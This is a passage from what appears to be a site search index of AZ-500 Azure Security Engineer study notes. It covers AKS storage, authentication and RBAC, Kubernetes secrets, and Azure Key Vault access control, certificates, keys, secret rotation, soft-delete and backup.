        A PersistentVolumeClaim requests either Disk or File storage of a particular StorageClass, access mode, and size. The Kubernetes API server can dynamically provision the underlying storage resource in Azure if there is no existing resource to fulfill the claim based on the defined StorageClass. The pod definition includes the volume mount once the volume has been connected to the pod. A PersistentVolume is bound to a PersistentVolumeClaim once an available storage resource has been assigned to the pod requesting it. There is a 1:1 mapping of persistent volumes to claims.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#48-secure-authentication-to-azure-kubernetes-service-with-active-directory","title":"4.8. Secure authentication to Azure Kubernetes Service with Active Directory","text":"

        There are basically two mechanism to secure authentication to Azure Kebernetes Service:

        • Kubernetes service accounts: One of the primary user types in Kubernetes is a service account. A service account exists and is managed by, the Kubernetes API. The credentials for service accounts are stored as Kubernetes secrets, which allows them to be used by authorized pods to communicate with the API Server. Most API requests provide an authentication token for a service account or a normal user account. Normal user accounts allow more traditional access for human administrators or developers, not just services and processes. Kubernetes itself doesn't provide an identity management solution where regular user accounts and passwords are stored. Instead, external identity solutions can be integrated into Kubernetes. For AKS clusters, this integrated identity solution is Microsoft Entra ID.
        • Microsoft Entra integration: The security of AKS clusters can be enhanced with the integration of Microsoft Entra ID. With Microsoft Entra ID, you can integrate on-premises identities into AKS clusters to provide a single source for account management and security. With Microsoft Entra integrated AKS clusters, you can grant users or groups access to Kubernetes resources within a namespace or across the cluster. To obtain a Kubectl configuration context, a user can run the az aks get-credentials command. When a user then interacts with the AKS cluster with kubectl, they are prompted to sign in with their Microsoft Entra credentials. This approach provides a single source for user account management and password credentials. The user can only access the resources as defined by the cluster administrator.

        Microsoft Entra authentication in AKS clusters uses OpenID Connect, an identity layer built on top of the OAuth 2.0 protocol. OAuth 2.0 defines mechanisms to obtain and use access tokens to access protected resources, and OpenID Connect implements authentication as an extension to the OAuth 2.0 authorization process.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#49-access-to-azure-kubernetes-service-using-azure-role-based-access-controls","title":"4.9. Access to Azure Kubernetes Service using Azure role-based access controls","text":"

        Azure role-based access control (RBAC) is an authorization system built on\u00a0Azure Resource Manager\u00a0that provides fine-grained access management of Azure resources.

        RBAC system Description Kubernetes RBAC Designed to work on Kubernetes resources within your AKS cluster. Azure RBAC Designed to work on resources within your Azure subscription.

        There are two levels of access needed to fully operate an AKS cluster:

        • Access the AKS resource in your Azure subscription.
          • Control scaling or upgrading your cluster using the AKS APIs.
          • Pull your\u00a0kubeconfig.
        • Access to the Kubernetes API. This access is controlled by either:
          • Kubernetes RBAC\u00a0(traditionally).
          • Integrating Azure RBAC with AKS for Kubernetes authorization.

        Before you assign permissions to users with Kubernetes RBAC, you first define those permissions as a Role. Kubernetes roles grant permissions. There is no concept of a deny permission.

        Roles are used to grant permissions within a namespace. If you need to grant permissions across the entire cluster, or to cluster resources outside a given namespace, you can instead use ClusterRoles.

        A ClusterRole works in the same way to grant permissions to resources, but can be applied to resources across the entire cluster, not a specific namespace.

        Once roles are defined to grant permissions to resources, you assign those Kubernetes RBAC permissions with a RoleBinding. If your AKS cluster integrates with Microsoft Entra ID, bindings are how those Microsoft Entra users are granted permissions to perform actions within the cluster.

        A ClusterRoleBinding works in the same way to bind roles to users, but can be applied to resources across the entire cluster, not a specific namespace. This approach lets you grant administrators or support engineers access to all resources in the AKS cluster.

        Secrets at Linux: A Kubernetes Secret is used to inject sensitive data into pods, such as access credentials or keys. You first create a Secret using the Kubernetes API. When you define your pod or deployment, a specific Secret can be requested. Secrets are only provided to nodes that have a scheduled pod that requires it, and the Secret is stored in tmpfs, not written to disk. When the last pod on a node that requires a Secret is deleted, the Secret is deleted from the node's tmpfs. Secrets are stored within a given namespace and can only be accessed by pods within the same namespace. The use of Secrets reduces the sensitive information that is defined in the pod or service YAML manifest. Instead, you request the Secret stored in Kubernetes API Server as part of your YAML manifest. This approach only provides the specific pod access to the Secret. Please note: the raw secret manifest files contains the secret data in base64 format. Therefore, this file should be treated as sensitive information, and never committed to source control.

        Secrets in Windows containers: Secrets are written in clear text on the node\u2019s volume (as compared to tmpfs/in-memory on linux). This means customers have to do two things:

        • Use file ACLs to secure the secrets file location
        • Use volume-level encryption using BitLocker
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/","title":"III. Data and applications","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#1-azure-key-vault","title":"1. Azure Key Vault","text":"

        Azure Key Vault helps safeguard cryptographic keys and secrets that cloud applications and services use. Key Vault streamlines the key management process and enables you to maintain control of keys that access and encrypt your data. Developers can create keys for development and testing in minutes, and then migrate them to production keys. Security administrators can grant (and revoke) permission to keys, as needed. You can use Key Vault to create multiple secure containers, called vaults. Vaults help reduce the chances of accidental loss of security information by centralizing application secrets storage. Key vaults also control and log the access to anything stored in them.

        Azure Key Vault helps address the following issues:

        • Secrets management. You can use Azure Key Vault to securely store and tightly control access to tokens, passwords, certificates, API keys, and other secrets.
        • Key management. You use Azure Key Vault as a key management solution, making it easier to create and control the encryption keys used to encrypt your data.
        • Certificate management. Azure Key Vault is also a service that lets you easily provision, manage, and deploy public and private SSL/TLS certificates for use with Azure and your internal connected resources.
        • Store secrets backed by hardware security modules (HSMs). The secrets and keys can be protected either by software, or FIPS 140-2 Level 2 validates HSMs.

        Key Vault is not intended as storage for user passwords.

        Access to a key vault is controlled through two separate interfaces: management plane, and data plane. The management plane and data plane access controls work independently. Use RBAC to control what users have access to. For example, if you want to grant an application access to use keys in a key vault, you only need to grant data plane access permissions by using key vault access policies, and no management plane access is needed for this application. Conversely, if you want a user to be able to read vault properties and tags but not have any access to keys, secrets, or certificates, you can grant this user read access by using RBAC, and no access to the data plane is required.

        If a user has contributor permissions (RBAC) to a key vault management plane, they can grant themselves access to the data plane by setting a key vault access policy. We recommend that you tightly control who has contributor access to your key vaults, to ensure that only authorized persons can access and manage your key vaults, keys, secrets, and certificates.

        Azure Resource Manager can securely deploy certificates stored in Azure Key Vault to Azure VMs when the VMs are deployed. By setting appropriate access policies for the key vault, you also control who gets access to your certificate. Another benefit is that you manage all your certificates in one place in Azure Key Vault.

        Deletion of key vaults or key vault objects can be either inadvertent or malicious. Enable the soft delete and purge protection features of Key Vault, particularly for keys that are used to encrypt data at rest. Deletion of these keys is equivalent to data loss, so you can recover deleted vaults and vault objects if needed. Practice Key Vault recovery operations on a regular basis.

        Azure Key Vault is offered in two service tiers\u2014standard and premium. The main difference between Standard and Premium is that Premium supports HSM-protected keys.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#11-configure-key-vault-access","title":"1.1. Configure Key Vault access","text":"

        Access to a key vault is controlled through two interfaces: the management plane, and the data plane. The management plane is where you manage Key Vault itself. Operations in this plane include creating and deleting key vaults, retrieving Key Vault properties, and updating access policies. The data plane is where you work with the data stored in a key vault. You can add, delete, and modify keys, secrets, and certificates from here.

        To access a key vault in either plane, all callers (users or applications) must have proper authentication and authorization. Authentication establishes the identity of the caller. Authorization determines which operations the caller can execute.

        Both planes use Microsoft Entra ID for authentication. For authorization, the management plane uses RBAC, and the data plane can use either\u00a0newly added RBAC\u00a0or a Key Vault access policy.

        When you create a key vault in an Azure subscription, its automatically associated with the Microsoft Entra tenant of the subscription. Applications can access Key Vault in two ways:

        • User plus application access. The application accesses Key Vault on behalf of a signed-in user. Examples of this type of access include Azure PowerShell and the Azure portal. User access is granted in two ways. They can either access Key Vault from any application, or they must use a specific application (referred to as compound identity).
        • Application-only access. The application runs as a daemon service or background job. The application identity is granted access to the key vault.

        For both types of access, the application authenticates with Microsoft Entra ID. The model of a single mechanism for authentication to both planes has several benefits:

        • Organizations can centrally control access to all key vaults in their organization.
        • If a user leaves, they instantly lose access to all key vaults in the organization.
        • Organizations can customize authentication by using the options in Microsoft Entra ID, such as to enable multifactor authentication for added security.
        Role Management plane permissions Data plane permissions Security team Key Vault Contributor Keys: backup, create, delete, get, import, list, restore. Secrets: all operations Developers and operators Key Vault deploy permission\u00a0Note: This permission allows deployed VMs to fetch secrets from a key vault. None Auditors None Keys: list Secrets: list.\u00a0Note: This permission enables auditors to inspect attributes (tags, activation dates, expiration dates) for keys and secrets not emitted in the logs. Application None Keys: sign Secrets: get

        The three team roles need access to other resources along with Key Vault permissions. To deploy VMs (or the Web Apps feature of Azure App Service), developers and operators need Contributor access to those resource types. Auditors need read access to the Storage account where the Key Vault logs are stored.

        Some built-in RBAC in Azure:

        Built-in role Description ID Key Vault Administrator Perform all data plane operations on a key vault and all objects in it, including certificates, keys, and secrets. Cannot manage key vault resources or manage role assignments. Only works for key vaults that use the 'Azure role-based access control' permission model. 00482a5a-887f-4fb3-b363-3b7fe8e74483 Key Vault Certificates Officer Perform any action on the certificates of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. a4417e6f-fecd-4de8-b567-7b0420556985 Key Vault Crypto Officer Perform any action on the keys of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. 14b46e9e-c2b7-41b4-b07b-48a6ebf60603 Key Vault Crypto Service Encryption User Read metadata of keys and perform wrap/unwrap operations. Only works for key vaults that use the 'Azure role-based access control' permission model. e147488a-f6f5-4113-8e2d-b22465e65bf6 Key Vault Crypto User Perform cryptographic operations using keys. Only works for key vaults that use the 'Azure role-based access control' permission model. 12338af0-0e69-4776-bea7-57ae8d297424 Key Vault Reader Read metadata of key vaults and its certificates, keys, and secrets. Cannot read sensitive values such as secret contents or key material. Only works for key vaults that use the 'Azure role-based access control' permission model. 21090545-7ca7-4776-b22c-e363652d74d2 Key Vault Secrets Officer Perform any action on the secrets of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. b86a8fe4-44ce-4948-aee5-eccb2c155cd7 Key Vault Secrets User Read secret contents including secret portion of a certificate with private key. Only works for key vaults that use the 'Azure role-based access control' permission model. 4633458b-17de-408a-b874-0445c86b69e6","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#12-deploy-and-manage-key-vault-certificates","title":"1.2. Deploy and manage Key Vault certificates","text":"

        Key Vault certificates support provides for management of your x509 certificates and enables:

        • A certificate owner to create a certificate through a Key Vault creation process or through the import of an existing certificate. Includes both self-signed and CA-generated certificates.
        • A Key Vault certificate owner to implement secure storage and management of X509 certificates without interaction with private key material.
        • A certificate owner to create a policy that directs Key Vault to manage the life-cycle of a certificate.
        • Certificate owners to provide contact information for notification about lifecycle events of expiration and renewal of certificate.
        • Automatic renewal with selected issuers - Key Vault partner X509 certificate providers and CAs.

        When a Key Vault certificate is created, an addressable key and secret are also created with the same name. The Key Vault key allows key operations and the Key Vault secret allows retrieval of the certificate value as a secret. A Key Vault certificate also contains public x509 certificate metadata.

        When a Key Vault certificate is created, it can be retrieved from the addressable secret with the private key in either PFX or PEM format. However, the policy used to create the certificate must indicate that the key is exportable. If the policy indicates non-exportable, then the private key isn't a part of the value when retrieved as a secret.

        The addressable key becomes more relevant with non-exportable Key Vault certificates. The addressable Key Vault key\u2019s operations are mapped from the\u00a0keyusage\u00a0field of the Key Vault certificate policy used to create the Key Vault certificate. If a Key Vault certificate expires, it\u2019s addressable key and secret become inoperable.

        Two types of key are supported \u2013 RSA or RSA HSM with certificates. Exportable is only allowed with RSA, and is not supported by RSA HSM.

        Certificate policy

        A certificate policy contains information on how to create and manage the Key Vault certificate lifecycle. When a certificate with private key is imported into the Key Vault, a default policy is created by reading the x509 certificate. When a Key Vault certificate is created from scratch, a policy needs to be supplied. This policy specifies how to create the Key Vault certificate version, or the next Key Vault certificate version. At a high level, a certificate policy contains the following information:

        • X509 certificate properties. Contains subject name, subject alternate names, and other properties used to create an x509 certificate request.
        • Key Properties. Contains key type, key length, exportable, and reuse key fields. These fields instruct key vault on how to generate a key.
        • Secret properties. Contains secret properties such as content type of addressable secret to generate the secret value, for retrieving certificate as a secret.
        • Lifetime Actions. Contains lifetime actions for the Key Vault certificate. Each lifetime action contains:
          • Trigger, which specifies via days before expiry or lifetime span percentage.
          • Action, which specifies the action type: emailContacts, or autoRenew.
        • Issuer: Contains the parameters about the certificate issuer to use to issue x509 certificates.
        • Policy attributes: Contains attributes associated with the policy.

        Certificate Issuer

        Before you can create a certificate issuer in a Key Vault, the following two prerequisite steps must be completed successfully:

        1. Onboard to CA providers: An organization administrator must onboard their company with at least one CA provider.
        2. Admin creates requester credentials for Key Vault to enroll (and renew) SSL certificates: Provides the configuration to be used to create an issuer object of the provider in the key vault.

        Certificate contacts

        Certificate contacts contain contact information to send notifications triggered by certificate lifetime events. The contacts information is shared by all the certificates in the key vault. If a certificate's policy is set to auto renewal, then a notification is sent for the following events:

        • Before certificate renewal
        • After certificate renewal, and stating if the certificate was successfully renewed, or if there was an error, requiring manual renewal of the certificate
        • When it\u2019s time to renew a certificate for a certificate policy that is set to manually renew (email only)

        Certificate access control

        The Key Vault that contains certificates manages access control for those same certificates. he access control policy for certificates is distinct from the access control policies for keys and secrets in the same Key Vault. Users might create one or more vaults to hold certificates, to maintain scenario appropriate segmentation and management of certificates.

        • Permissions for certificate management operations:
          • get: Get the current certificate version, or any version of a certificate.
          • list: List the current certificates, or versions of a certificate.
          • update: Update a certificate.
          • create: Create a Key Vault certificate.
          • import: Import certificate material into a Key Vault certificate.
          • delete: Delete a certificate, its policy, and all of its versions.
          • recover: Recover a deleted certificate.
          • backup: Back up a certificate in a key vault.
          • restore: Restore a backed-up certificate to a key vault.
          • managecontacts: Manage Key Vault certificate contacts.
          • manageissuers: Manage Key Vault certificate authorities/issuers.
          • getissuers: Get a certificate's authorities/issuers.
          • listissuers: List a certificate's authorities/issuers.
          • setissuers: Create or update a Key Vault certificate's authorities/issuers.
          • deleteissuers: Delete a Key Vault certificate's authorities/issuers.
        • Permissions for privileged operations:
          • purge: Purge (permanently delete) a deleted certificate.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#13-create-key-vault-keys","title":"1.3. Create Key Vault keys","text":"

        Cryptographic keys in Key Vault are represented as\u00a0JSON Web Key (JWK)\u00a0objects. There are two types of keys, depending on how they were created.

        • Soft keys: A key processed in software by Key Vault, but is encrypted at rest using a system key that is in a\u00a0Hardware Security Module (HSM). Clients may import an existing RSA or EC (Elliptic Curve) key, or request that Key Vault generates one.
        • Hard keys: A key processed in an HSM (Hardware Security Module). These keys are protected in one of the Key Vault HSM Security Worlds (there's one Security World per geography to maintain isolation). Clients may import an RSA or EC key, in soft form or by exporting from a compatible HSM device. Clients may also request Key Vault to generate a key.

        Key operations. - Key Vault supports many operations on key objects. Here are a few:

        • Create: Allows a client to create a key in Key Vault. The value of the key is generated by Key Vault and stored, and isn't released to the client. Asymmetric keys may be created in Key Vault.
        • Import: Allows a client to import an existing key to Key Vault. Asymmetric keys may be imported to Key Vault using many different packaging methods within a JWK construct.
        • Update: Allows a client with sufficient permissions to modify the metadata (key attributes) associated with a key previously stored within Key Vault.
        • Delete: Allows a client with sufficient permissions to delete a key from Key Vault

        Cryptographic operations. - Once a key has been created in Key Vault, the following cryptographic operations may be performed using the key. For best application performance, verify that operations are performed locally.

        • Sign and Verify: Strictly, this operation is \"sign hash\" or \"verify hash\", as Key Vault doesn't support hashing of content as part of signature creation. Applications should hash the data to be signed locally, then request that Key Vault signs the hash. Verification of signed hashes is supported as a convenience operation for applications that may not have access to [public] key material.
        • Key Encryption / Wrapping: A key stored in Key Vault may be used to protect another key, typically a symmetric\u00a0content encryption key (CEK). When the key in Key Vault is asymmetric, key encryption is used. When the key in Key Vault is symmetric, key wrapping is used.
        • Encrypt and Decrypt: A key stored in Key Vault may be used to encrypt or decrypt a single block of data. The size of the block is determined using the key type and selected encryption algorithm. The Encrypt operation is provided for convenience, for applications that may not have access to [public] key material.

        Apps hosted in App Service and Azure Functions can now define a reference to a secret managed in Key Vault as part of their application settings.

        Configure a hardware security module key-generation solution. -

        For added assurance, when you use Azure Key Vault, you can import or generate keys in hardware security modules (HSMs) that never leave the HSM boundary. This scenario is often referred to as Bring Your Own Key (BYOK). The HSMs are FIPS 140-2 Level 2 validated. Azure Key Vault uses Thales nShield family of HSMs to protect your keys. (This functionality isn't available for Azure China.) Generating and transferring an HSM-protected key over the Internet:

        • You generate the key from an offline workstation, which reduces the attack surface.
        • The key is encrypted with a\u00a0Key Exchange Key (KEK), which stays encrypted until transferred to the Azure Key Vault HSMs. Only the encrypted version of your key leaves the original workstation.
        • The toolset sets properties on your tenant key that binds your key to the Azure Key Vault security world. After the Azure Key Vault HSMs receive and decrypt your key, only these HSMs can use it. Your key can't be exported. This binding is enforced using the Thales HSMs.
        • The KEK that encrypts your key is generated inside the Azure Key Vault HSMs, and isn't exportable. The HSMs enforce that there can be no clear version of the KEK outside the HSMs. In addition, the toolset includes attestation from Thales that the KEK isn't exportable and was generated inside a genuine HSM manufactured by Thales.
        • The toolset includes attestation from Thales that the Azure Key Vault security world was also generated on a genuine HSM manufactured by Thales.
        • Microsoft uses separate KEKs and separate security worlds in each geographical region. This separation ensures that your key can be used only in data centers in the region in which you encrypted it. For example, a key from a European customer can't be used in data centers in North American or Asia.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#14-manage-customer-managed-keys","title":"1.4. Manage customer managed keys","text":"

        Once, you have created your Key Vault and have populated it with keys and secrets. The next step is to set up a rotation strategy for the values you store as Key Vault secrets. Secrets can be rotated in several ways:

        • As part of a manual process
        • Programmatically by using REST API calls
        • Through an Azure Automation script

        Example of storage service encryption with customer-managed Keys. - This service uses Azure Key Vault that provides highly available and scalable secure storage for RSA cryptographic keys backed by FIPS 140-2 Level 2 validated HSMs (Hardware Security Modules). Key Vault streamlines the key management process and enables customers to maintain control of keys that are used to encrypt data, manage, and audit their key usage, in order to protect sensitive data as part of their regulatory or compliance needs, HIPAA and BAA compliant.

        Customers can generate/import their RSA key to Azure Key Vault and enable Storage Service Encryption. Azure Storage handles the encryption and decryption in a fully transparent fashion using envelope encryption in which data is encrypted using an AES-based key, which in turn is protected using the Customer-Managed Key stored in Azure Key Vault.

        Customers can rotate their key in Azure Key Vault as per their compliance policies. When they rotate their key, Azure Storage detects the new key version and re-encrypts the Account Encryption Key for that storage account. Key rotation doesn't result in re-encryption of all data and there's no other action required from user.

        Customers can also revoke access to the storage account by revoking access on their key in Azure Key Vault. There are several ways to revoke access to your keys. Revoking access effectively blocks access to all blobs in the storage account as the Account Encryption Key is inaccessible by Azure Storage.

        Customers can enable this feature on all available redundancy types of Azure Blob storage including premium storage and can toggle from using Microsoft managed to using customer-managed keys. There's no extra charge for enabling this feature.

        You can enable this feature on any Azure Resource Manager storage account using the Azure portal, Azure PowerShell, Azure CLI, or the Microsoft Azure Storage Resource Provider API.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#15-key-vault-secrets","title":"1.5. Key vault secrets","text":"

        Key Vault provides secure storage of secrets, such as passwords and database connection strings. From a developer's perspective, Key Vault APIs accept and return secret values as strings. Internally, Key Vault stores and manages secrets as sequences of octets (8-bit bytes), with a maximum size of 25k bytes each. The Key Vault service doesn't provide semantics for secrets. It merely accepts the data, encrypts it, stores it, and returns a secret identifier (\"ID\"). The identifier can be used to retrieve the secret at a later time.

        Key Vault also supports a contentType field for secrets. Clients may specify the content type of a secret to assist in interpreting the secret data when it's retrieved. The maximum length of this field is 255 characters. There are no pre-defined values. The suggested usage is as a hint for interpreting the secret data. For instance, an implementation may store both passwords and certificates as secrets, then use this field to differentiate.

        As shown above, the values for Key Vault Secrets are:

        • Name-value pair -\u00a0Name must be unique in the Vault
        • Value can be any\u00a0Unicode Transformation Format (UTF-8)\u00a0string - max of 25 KB in size
        • Manual or certificate creation
        • Activation date
        • Expiration date

        Encryption. - All secrets in your Key Vault are stored encrypted. Key Vault encrypts secrets at rest with a hierarchy of encryption keys, with all keys in that hierarchy are protected by modules that are Federal Information Processing Standards (FIPS) 140-2 compliant. This encryption is transparent, and requires no action from the user. The Azure Key Vault service encrypts your secrets when you add them, and decrypts them automatically when you read them. The encryption leaf key of the key hierarchy is unique to each key vault. The encryption root key of the key hierarchy is unique to the security world, and its protection level varies between regions:

        • China: root key is protected by a module that is validated for FIPS 140-2 Level 1.
        • Other regions: root key is protected by a module that is validated for FIPS 140-2 Level 2 or higher.

        Secret attributes. - In addition to the secret data, the following attributes may be specified:

        • exp: IntDate, optional,\u00a0default is forever. The\u00a0exp\u00a0(expiration time)\u00a0attribute identifies the expiration time on or after which the secret data\u00a0SHOULD NOT\u00a0be retrieved, except in particular situations. This field is for informational purposes only as it informs users of key vault service that a particular secret may not be used. Its value MUST be a number containing an IntDate value.
        • nbf: IntDate, optional,\u00a0default is now. The\u00a0nbf\u00a0(not before)\u00a0attribute identifies the time before which the secret data\u00a0SHOULD NOT\u00a0be retrieved, except in particular situations. This field is for informational purposes only. Its value\u00a0MUST\u00a0be a number containing an IntDate value.
        • enabled: boolean, optional,\u00a0default is true. This attribute specifies whether the secret data can be retrieved. The enabled attribute is used with\u00a0nbf\u00a0and\u00a0exp\u00a0when an operation occurs between\u00a0nbf\u00a0and\u00a0exp, it will only be permitted if enabled is set to true. Operations outside the\u00a0nbf\u00a0and\u00a0exp\u00a0window are automatically disallowed, except in particular situations.

        There are more read-only attributes that are included in any response that includes secret attributes:

        • created: IntDate, optional. The created attribute indicates when this version of the secret was created. This value is null for secrets created prior to the addition of this attribute. Its value must be a number containing an IntDate value.
        • updated: IntDate, optional. The updated attribute indicates when this version of the secret was updated. This value is null for secrets that were last updated prior to the addition of this attribute. Its value must be a number containing an IntDate value.

        Secret access control. - Access Control for secrets managed in Key Vault, is provided at the level of the Key Vault that contains those secrets. The following permissions can be used, on a per-principal basis, in the secrets access control entry on a vault, and closely mirror the operations allowed on a secret object:

        • Permissions for secret management operations

          • get: Read a secret
          • list: List the secrets or versions of a secret stored in a Key Vault
          • set: Create a secret
          • delete: Delete a secret
          • recover: Recover a deleted secret
          • backup: Back up a secret in a key vault
          • restore: Restore a backed up secret to a key vault
          • Permissions for privileged operations

          • purge: Purge (permanently delete) a deleted secret

        You can specify more application-specific metadata in the form of tags. Key Vault supports up to 15 tags, each of which can have a 256 character name and a 256 character value.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#configure-key-rotation","title":"Configure key rotation","text":"

        Once you have keys and secrets stored in the key vault it's important to think about a rotation strategy. There are several ways to rotate the values:

        • As part of a manual process
        • Programmatically by using API calls
        • Through an Azure Automation script

        This diagram shows how Event Grid and Function Apps can be used to automate the process.

        1. Thirty days before the expiration date of a secret, Key Vault publishes the \"near expiry\" event to Event Grid.
        2. Event Grid checks the event subscriptions and uses HTTP POST to call the function app endpoint subscribed to the event.
        3. The function app receives the secret information, generates a new random password, and creates a new version for the secret with the new password in Key Vault.
        4. The function app updates SQL Server with the new password.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#16-manage-key-vault-safety-and-recovery-features","title":"1.6. Manage Key Vault safety and recovery features","text":"

        Key Vault's soft-delete feature allows recovery of the deleted vaults and deleted key vault objects (for example, keys, secrets, certificates), known as soft-delete. This safeguard offer the following protections:

        • Once a secret, key, certificate, or key vault is deleted, it remains recoverable for a configurable period of 7 to 90 calendar days. If no configuration is specified, the default recovery period is set to 90 days. Users are provided with sufficient time to notice an accidental secret deletion and respond.
        • When creating a new key vault, soft-delete is on by default. Once soft-delete is enabled on a key vault, it can't be disabled. Once set, the retention policy interval can't be changed.
        • The soft-delete feature is available through the REST API, the Azure CLI, PowerShell, .NET/C# interfaces, and ARM templates.
        • The purge protection retention policy uses the same interval (7-90 days). Once set, the retention policy interval can't be changed.
        • You can't reuse the name of a key vault that has been soft-deleted until the retention period has passed.
        • Permanently deleting, purging, a key vault is possible via a POST operation on the proxy resource and requires special privileges. Generally, only the subscription owner is able to purge a key vault. The POST operation triggers the immediate and irrecoverable deletion of that vault. Exceptions are:

          • When the Azure subscription has been marked as\u00a0undeletable. In this case, only the service may then perform the actual deletion, and does so as a scheduled process.
          • When the--enable-purge-protection argument is enabled on the vault itself. In this case, Key Vault waits for 90 days from when the original secret object was marked for deletion to permanently delete the object.
        • To purge a secret in the soft-deleted state, a service principal must be granted another \"purge\" access policy permission. The purge access policy permission isn't granted by default to any service principal including key vault and subscription owners and must be deliberately set. By requiring an elevated access policy permission to purge a soft-deleted secret, it reduces the probability of accidentally deleting a secret.

        Key vault recovery. - Upon deleting a key vault object, the service will place the object in a deleted state, making it inaccessible to any retrieval operations. During the soft-delete retention interval, the following apply:

        • You may list all of the key vaults and key vault objects in the soft-delete state for your subscription as well as access deletion and recovery information about them. Only users with special permissions can list deleted vaults. We recommend that our users create a custom role with these special permissions for handling deleted vaults.
        • A key vault with the same name can't be created in the same location; correspondingly, a key vault object can't be created in a given vault if that key vault contains an object with the same name and which is in a deleted state.
        • Only a privileged user may restore a key vault or key vault object by issuing a recover command on the corresponding proxy resource. The user, member of the custom role, who has the privilege to create a key vault under the resource group can restore the vault.
        • Only a privileged user may forcibly delete a key vault or key vault object by issuing a delete command on the corresponding proxy resource.

        Unless a key vault or key vault object is recovered, at the end of the retention interval the service performs a purge of the soft-deleted key vault or key vault object and its content. Resource deletion may not be rescheduled.

        Billing. - In general, when an object (a key vault or a key or a secret) is in deleted state, there are only two operations possible: 'purge' and 'recover'. All the other operations fail. Therefore, even though the object exists, no operations can be performed and hence no usage will occur, so no bill. However there are following exceptions:

        • 'purge' and 'recover' actions count towards normal key vault operations and billed.
        • If the object is an HSM-key, the 'HSM Protected key' charge per key version per month charge applies if a key version has been used in last 30 days. After that, since the object is in deleted state no operations can be performed against it, so no charge will apply.

        Soft-deleted protection by default from February 2025. - If a secret is deleted and the key vault doesn't have soft-deleted protection, it's deleted permanently. Although users can currently opt out of soft-delete during key vault creation, this ability is deprecated. In February 2025, Microsoft enables soft-delete protection on all key vaults, and users are no longer be able to opt out of or turn off soft-delete. This, protect secrets from accidental or malicious deletion by a user.

        Key vault backup. - Back up secrets only if you have a critical business justification. Backing up secrets in your key vault may introduce operational challenges such as maintaining multiple sets of logs, permissions, and backups when secrets expire or rotate. Key Vault maintains availability in disaster scenarios and will automatically fail over requests to a paired region without any intervention from a user. If you want protection against accidental or malicious deletion of your secrets, configure soft-delete and purge protection features on your key vault.

        Key Vault does not support the ability to backup more than 500 past versions of a key, secret, or certificate object. Attempting to backup a key, secret, or certificate object may result in an error. It is not possible to delete previous versions of a key, secret, or certificate.

        Key Vault doesn't currently provide a way to back up an entire key vault in a single operation. Any attempt to use the commands listed in this document to do an automated backup of a key vault may result in errors and not supported by Microsoft or the Azure Key Vault team.

        When you back up a key vault object, such as a secret, key, or certificate, the backup operation downloads the object as an encrypted blob. This blob can't be decrypted outside of Azure.\u00a0To get usable data from this blob, you must restore the blob into a key vault within the same Azure subscription and Azure geography. To back up a key vault object, you must have:

        • Contributor-level or higher permissions on an Azure subscription.
        • A primary key vault that contains the secrets you want to back up.
        • A secondary key vault where secrets are restored.

        Azure Dedicated HSM is most suitable for \u201clift-and-shift\u201d scenarios that require direct and sole access to HSM devices. Examples include:

        • Migrating applications from on-premises to Azure Virtual Machines
        • Migrating applications from Amazon AWS EC2 to virtual machines that use the AWS Cloud HSM Classic service
        • Running shrink-wrapped software such as Apache/Ngnix SSL Offload, Oracle TDE, and ADCS in Azure Virtual Machines

        Azure Dedicated HSM is not a good fit for the following type of scenario: Microsoft cloud services that support encryption with customer-managed keys (such as Azure Information Protection, Azure Disk Encryption, Azure Data Lake Store, Azure Storage, Azure SQL Database, and Customer Key for Office 365) that are not integrated with Azure Dedicated HSM.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#2-application-security-features","title":"2. Application Security features","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#21-microsoft-identity-platform","title":"2.1. Microsoft Identity Platform","text":"

        Some acronyms:

        • Azure AD Authentication Library (ADAL)
        • Microsoft Authentication Library (MSAL)
        • Microsoft Secure Development Lifecycle (SDL)

        Microsoft identity platform is an evolution of the Azure Active Directory (Azure AD) developer platform. The Microsoft identity platform supports industry-standard protocols such as OAuth 2.0 and OpenID Connect. With this unified Microsoft identity platform (v2.0), you can write code once and authenticate any Microsoft identity into your application.

        The fully supported open-source Microsoft Authentication Library (MSAL) is recommended for use against the identity platform endpoints. MSAL... - is simple to use - provides great single sign-on (SSO) experiences for your users - helps you achieve high reliability and performance, - and is developed using Microsoft Secure Development Lifecycle (SDL).

        With the Microsoft identity platform, one can expand their reach to these kinds of users:

        • Work and school accounts (Microsoft Entra ID provisioned accounts)
        • Personal accounts (such as Outlook.com or Hotmail.com)
        • Your customers who bring their own email or social identity (such as LinkedIn, Facebook, and Google) via MSAL and Azure AD Business-to-Consumer (B2C)

